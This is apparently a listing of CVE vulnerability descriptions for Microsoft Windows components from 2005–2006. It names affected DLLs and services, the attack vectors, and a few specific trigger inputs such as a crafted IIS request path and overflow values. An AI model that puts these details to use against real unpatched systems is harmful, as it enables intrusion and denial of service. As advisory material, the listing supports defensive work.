Microsoft Windows does not properly display log data that contains '%' (percent) characters, which might make it impossible to use Event Viewer to determine the actual data that triggered an event, and might produce long strings that are not properly handled by certain processes that rely on Event Viewer. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6659] The Microsoft Office Outlook Recipient ActiveX control (ole32.dll) in Windows XP SP2 allows remote attackers to cause a denial of service (Internet Explorer 7 hang) via crafted HTML. [CVE-2006-6602] explorer.exe in Windows Explorer 6.00.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a crafted WMV file. [CVE-2006-6601] Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0. [CVE-2006-6579] Microsoft Windows XP has weak permissions (FILE_WRITE_DATA and FILE_READ_DATA for Everyone) for %WINDIR%\pchealth\ERRORREP\QHEADLES, which allows local users to write and read files in this folder, as demonstrated by an ASP shell that has write access by IWAM_machine and read access by IUSR_Machine. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. [CVE-2006-6252] Microsoft Windows Live Messenger 8.0 and earlier, when gestual emoticons are enabled, allows remote attackers to cause a denial of service (CPU consumption) via a long string composed of ":D" sequences, which are interpreted as emoticons. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5745] Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. [CVE-2006-5614] Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5448] The drmstor.dll ActiveX object in Microsoft Windows Digital Rights Management System (DRM) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long parameter to the StoreLicense function, which triggers "memory corruption" and possibly a buffer overflow. [CVE-2006-5270] Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file. [CVE-2006-5028] Directory traversal vulnerability in filemanager/filemanager.php in SWsoft Plesk 7.5 Reload and Plesk 7.6 for Microsoft Windows allows remote attackers to list arbitrary directories via a ../ (dot dot slash) in the file parameter in a chdir action. [CVE-2006-4868] Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4138] Multiple unspecified vulnerabilities in Microsoft Windows Help File viewer (winhlp32.exe) allow user-assisted attackers to execute arbitrary code via crafted HLP files. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3944] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via a (1) Forms.ListBox.1 or (2) Forms.ListBox.1 object with the ListWidth property set to (a) 0x7fffffff, which triggers an integer overflow exception, or to (b) 0x7ffffffe, which triggers a null dereference. [CVE-2006-3943] Stack-based buffer overflow in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3915] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by iterating over any native function, as demonstrated with the window.alert function, which triggers a null dereference. [CVE-2006-3899] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the stringToBinary function of the CEnroll.CEnroll.2 ActiveX object with a long second argument, which triggers an invalid memory access inside the SysAllocStringLen function. [CVE-2006-3898] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the Click method of the Internet.HHCtrl.1 ActiveX object before initializing the URL, which triggers a null dereference. [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3471] Microsoft Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) via a table with a frameset as a child, which triggers a null dereference, as demonstrated using the appendChild method. [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3442] Unspecified vulnerability in Pragmatic General Multicast (PGM) in Microsoft Windows XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted multicast message. [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-3209] DISPUTED The Task scheduler (at.exe) on Microsoft Windows XP spawns each scheduled process with SYSTEM permissions, which allows local users to gain privileges. NOTE: this issue has been disputed by third parties, who state that the Task scheduler is limited to the Administrators group by default upon installation. [CVE-2006-2766] Buffer overflow in INETCOMM.DLL, as used in Microsoft Internet Explorer 6.0 through 6.0 SP2, Windows Explorer, Outlook Express 6, and possibly other programs, allows remote user-assisted attackers to cause a denial of service (application crash) via a long mhtml URI in the URL value in a URL file. [CVE-2006-2386] Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2376] Integer overflow in the PolyPolygon function in Graphics Rendering Engine on Microsoft Windows 98 and Me allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) or EMF image with a sum of entries in the vertext counts array and number of polygons that triggers a heap-based buffer overflow. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2218] Unspecified vulnerability in Internet Explorer 6.0 on Microsoft Windows XP SP2 allows remote attackers to execute arbitrary code via "exceptional conditions" that trigger memory corruption, as demonstrated using an exception handler and nested object tags, a variant of CVE-2006-1992. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2056] Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1591] Heap-based buffer overflow in Microsoft Windows Help winhlp32.exe allows user-assisted attackers to execute arbitrary code via crafted embedded image data in a .hlp file. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2006-1476] Windows Firewall in Microsoft Windows XP SP2 produces incorrect application block alerts when the application filename is ".exe" (with no characters before the "."), which might allow local user-assisted users to trick a user into unblocking a Trojan horse program, as demonstrated by a malicious ".exe" program in a folder named "Internet Explorer," which triggers a question about whether to unblock the "Internet Explorer" program. [CVE-2006-1475] Windows Firewall in Microsoft Windows XP SP2 does not produce application alerts when an application is executed using the NTFS Alternate Data Streams (ADS) filename:stream syntax, which might allow local users to launch a Trojan horse attack in which the victim does not obtain the alert that Windows Firewall would have produced for a non-ADS file. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0561] Cisco Secure Access Control Server (ACS) 3.x for Windows stores ACS administrator passwords and the master key in the registry with insecure permissions, which allows local users and remote administrators to decrypt the passwords by using Microsoft's cryptographic API functions to obtain the plaintext version of the master key. [CVE-2006-0143] Microsoft Windows Graphics Rendering Engine (GRE) allows remote attackers to corrupt memory and cause a denial of service (crash) via a WMF file containing (1) ExtCreateRegion or (2) ExtEscape function calls with arguments with inconsistent lengths. [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0014] Buffer overflow in Microsoft Outlook Express 5.5 and 6 allows remote attackers to execute arbitrary code via a crafted Windows Address Book (WAB) file containing "certain Unicode strings" and modified length values. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4360] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll//~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot). [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-3981] * DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2005-3595] By default Microsoft Windows XP Home Edition installs with a blank password for the Administrator account, which allows remote attackers to gain control of the computer. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to 